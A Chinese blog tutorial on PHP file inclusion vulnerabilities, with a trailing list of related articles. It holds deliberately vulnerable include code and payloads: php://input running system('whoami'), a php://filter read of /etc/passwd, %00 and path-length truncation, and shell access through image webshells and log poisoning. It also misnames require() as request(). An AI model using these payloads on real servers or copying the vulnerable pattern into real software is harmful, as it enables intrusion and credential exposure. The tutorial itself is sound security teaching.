php文件包含漏洞

最新推荐文章于 2024-05-21 16:19:37 发布
最新推荐文章于 2024-05-21 16:19:37 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: 文件包含 文章标签: 文件包含漏洞 Web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slip_666/article/details/79089164
版权

1.文件包含的原理

1.1为什么要使用文件包含

将一些自定义函数或功能写在一个a文件内,当b文件中要使用到a文件内的一些函数或功能时,b文件只需要包含a文件,这样b文件就可以直接调用a文件内定义好的函数或一些功能,这样方便省事。

1.2相关测试代码

php文件包含代码

<?php 
if ($_GET['file']) {
    include $_GET['file'];
}else {
    include 'default.php';
}
 ?>

存放于本地和远程服务器上的符合php语法的txt文件

<?php 
phpinfo();
 ?>

1.3本地文件包含(LFI)

条件:php配置文件中的allow_url_fopen = on选项打开

传入参数本地文件phpinfo.txt的相对或绝对路径?file=phpinfo.txt
符合php语法的内容被php解析
这里写图片描述

1.4远程文件包含(RFI)

条件:php配置文件中的allow_url_fopen = on,allow_url_include = on选项打开

传入参数远程服务器上的文件php.txt?file=http://192.168.1.168/php.txt
符合php语法的内容被php解析
这里写图片描述

2.文件包含漏洞

2.1漏洞原理

由于对传入的文件名或路径没有进行严格过滤,这就导致了可以包含一些其他对攻击者有用的文件,比如配置文件,图片木马等文件,这样就存在敏感信息泄露,被攻击者掌握服务器等危险。被包含的文件格式不限,其中符合脚本语言语法规范的部分会被脚本解析,其他部分会以明文暴露出来。

2.2相关函数

文件包含的案例多出现于以php语言中

include()           //包含的文件如果找不到,会发出警告,代码继续执行
request()           //包含的文件如果找不到,或发出致命错误,代码终止执行
include_once()
request_once()      //once表示只包含一次,不会重复包含

2.3php伪协议

1.input

通过post提交,利用php流input执行php代码

条件:allow_url_include = on

url栏:?file=php://input
post栏:<?php system('whoami');?>
这里写图片描述

2.filter

通过php流filter读取文件内容,配合base64编码,读出被解析的部分

条件:allow_url_include = on

传入参数:?file=php://filter/read=convert.base64-encode/resource=/etc/passwd
这里写图片描述

2.4漏洞利用技巧

1.%00截断

条件
魔术引号关闭magic_quotes_gpc = off
php版本小于5.3

有的文件包含会在传入参数后链接一个路径或者文件后缀,例如
测试代码

<?php 
$a = $_GET['file'];
include $a.'.txt'
?>

这个时候简单的包含一个文件将失败,可以尝试%00截断的方式将后面拼接的.txt给截断掉
%00会被解析成0x00,如果魔术引号开启,%00会被解析成/0
这里写图片描述

2.文件路径长度截断

除了可以使用%00截断,还可以尝试文件路径长度截断

条件
php版本小于5.3

可以在文件路径后添加
.
./文件路径为奇数时使用
/.文件路径为偶数时使用
着三种形式来达到超长文件路径的效果

Window下,文件路径长度超过259个字节后,超出的部分会被截断
Linux下下,文件路径长度超过4096个字节后,超出的部分会被截断
这里写图片描述

3.漏洞利用

  1. 包含图片马拿shell
  2. 包含日志文件拿shell
    通过在url中写马或在User-Agent中写马
    要求:通过burp或curl等工具写马绕过url编码,日志文件有可读权限,其目录有可执行权限
  3. 遍历目录,访问敏感文件
斯利普
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP 网络开发详解之远程文件包含漏洞
10-29
远程文件包含漏洞是指在PHP编程中,攻击者利用PHPinclude或require函数的特性来包含并执行远程服务器上的恶意脚本文件。因为PHPinclude/require函数既可以包含本地文件也可以包含远程文件,这就为攻击者提供了一...
web安全第九天:文件包含漏洞
cc777777777的博客
03-04 230
web安全第九天:文件包含漏洞
phpinclude once,php include_once的使用方法详解
weixin_39773215的博客
03-09 1273
include_once 语句在脚本执行期间包含并运行指定文件。此行为和 include 语句类似,唯一区别是如果该文件中已经被包含过,则不会再次包含。如同此语句名字暗示的那样,只会包含一次。include_once 可以用于在脚本执行期间同一个文件有可能被包含超过一次的情况下,想确保它只被包含一次以避免函数重定义,变量重新赋值等问题。更多信息参见 include 文档。Note:在 PHP 4中...
4、PHP的xml注入漏洞(xxe)
最新发布
weixin_51520483的博客
05-21 573
2、CTRL+f搜索xml,发现2.8.0版本,含有xml漏洞。5、在触发bug的包下面加上,获取flag。1、打开网页是一个PHP版本页面。青少年ctf:PHP的XXE。4、使用代码出发bug。
include引入php报错,如何解决引入php文件报错的问题
weixin_34788662的博客
03-26 577
引入php文件报错的解决办法:首先检测被包含的文件读权限是否打开;然后检测被包含的文件路径上的每个目录的x权限是否打开,将该权限打开即可。php脚本中include文件报错解决方法经常当php页面中利用include, require, require_once包含了一些其他位置的页面时,会出现错误,比如没有发现次页面,或者权限不允许等,可以根据以下方法来排除1. 出现“未找到文件“类似的错误时候...
宝塔Linux系统下,PHP使用include_once报错failed to open stream: No such file or directory
美奇软件开发工作室
11-21 3777
遇到问题: 在window环境下是正常的,但在Linux系统下,使用include_once引入就报错,如下: 错误分析: failed to open stream: No such file or directory的意思就是找不到目录,我们去看一下有没有这个目录,经过细心查看,发现目录是存在的,但却是大写开头的,而我们调用时,写的是小写。 真正原因: Linux环境下运行php加载文件对大小写敏感,所以在写法命名和加载的必须要一致。 解决方法: 把调用的文件夹目录名改成和真...
php include 权限,php 脚本中使用include包含文件出错的解决方法
weixin_36393239的博客
03-19 255
经常当php页面中利用include, require, require_once包含了一些其他位置的页面时,会出现错误,比如没有发现次页面,或者权限不允许等,可以根据以下方法来排除1. 出现“未找到文件“类似的错误时候,检查include文件的位置是否正确,下面引用php手册页面的原话:Files for including are first looked in include_path re...
Mang0-php文件包含漏洞.zip
03-12
**PHP文件包含漏洞详解** 在Web开发中,PHP是一种广泛使用的服务器端脚本语言,它提供了许多功能强大的特性,如文件包含(file inclusion)。然而,这些特性如果不慎使用,可能会导致安全问题,其中之一就是“文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
php 伪造本地文件包含漏洞的代码
10-28
### PHP 伪造本地文件包含漏洞详解 #### 一、引言 在Web开发领域,PHP是一种广泛使用的服务器端脚本语言。然而,由于其灵活性,PHP应用程序也面临着各种安全威胁,其中“本地文件包含”(Local File Inclusion,...
PHP包含文件函数includeinclude_once、require、require_once的使用
Leroi_Liu的博客
06-24 565
话不多说,直接上干货: 区别一: 1、include() 遇到包含文件不存在,或是出错的时候,不停止即行,并报错。 2、require()  遇到包含文件不存在,或是出错的时候,就停止即行,并报错。 举例: <?php include('hello.php'); echo 'include test final!'; require('hello.php'); ech
php包含截断小结.txt
07-24
php截断技术
php168下载任意文件漏洞利用工具
05-22
php168下载任意文件 内部用的。。现在共享上来 拿积分的,点击查看代码后 等上三秒钟 如果有漏洞就可以看到对方的源代码了。。。
php include_one,include.php文件require_onece出错
weixin_32148861的博客
04-02 133
( ! )Warning: require(C:\Users\lenovo\Documents\cert\repair\lib/load.php): failed to open stream: No such file or directory in C:\Users\lenovo\Documents\cert\repair\lib\img.func.php on line2Call Sta...
关于include_once,require_once包含文件失败的解决方法
偶尔一节
12-23 5173
今天遇到包含文件 访问项目直接就500了,一脸懵比,本地跑的都是没有问题的说; 我的解决思路是做exit一步一步尝试到底哪个文件出错了,说一下我的目录结构:ABC三个同级目录,C为我的工作目录,C文件会根据需求载入AB的一些文件,AB也会包含C里面的一些文件,当然AB之间也有一些包含关系;在C文件夹的入口文件就挂掉了,发现是包含了A文件夹下的某个文件挂掉了,刚开始以为是A文件夹下的文件出问题了,
phpinclude_once的意思,phpinclude_once的意思
weixin_30550287的博客
03-24 254
include_once() 语句是指在脚本执行期间包含并运行指定文件。此行为和 include() 语句类似,唯一区别是如果该文件中的代码已经被包含了,则不会再次包含。如同此语句名字暗示的那样,只会包含一次 。include_once() 应该用于在脚本执行期间同一个文件有可能被包含超过一次的情况下,想确保它只被包含一次以避免函数重定义,变量重新赋值等问题。使用 require_once() 和...
phpinclude_once 什么意思,【后端开发】php关于include_once与include之间的区别详解...
weixin_39665762的博客
03-24 1292
include如果引入两个文件,都有一个相同的函数名,那么就会发生重定义的错误。使用include_once可以避免此错误,一般都_once用的比较多。应该根据实际情况需求include和_once的区别。include和require区别当要包含的文件不存在时,include产生一个警告(Warning),该语句后面的程序会继续执行;而 require则导致一个致命错误(Fatal error)...
php代码审计及文件包含漏洞
xujunhui222的博客
02-15 3299
php代码审计及文件包含漏洞 一、文件包含漏洞介绍 1.什么是文件包含 相同代码重复出现在不同文件中出现代码亢余,所以出现了文件包含函数,就是让代码更为高效。需要用到的部分会去调用,且被包含的文件会当PHP代码执行,忽略本身后缀名。文件包含分为本地文件包含(Loacl File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI),远程文件包含需要在php.ini中设置allow_url_include = on 和 allow_url_fopen = on 2.
文件包含漏洞总结
金色%夕阳的博客
08-19 1227
文件包含漏洞总结 CTF中文件包含漏洞 0x01 什么是文件包含漏洞 0X02 文件包含漏洞的环境要求 0X03 常见文件包含函数 0X04 PHP伪协议 1、PHP://INPUT 2、PHP://FILTER 3、ZIP:// 4、DATA://与PHAR:// 0x05 包含APACHE日志文件 0x0
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值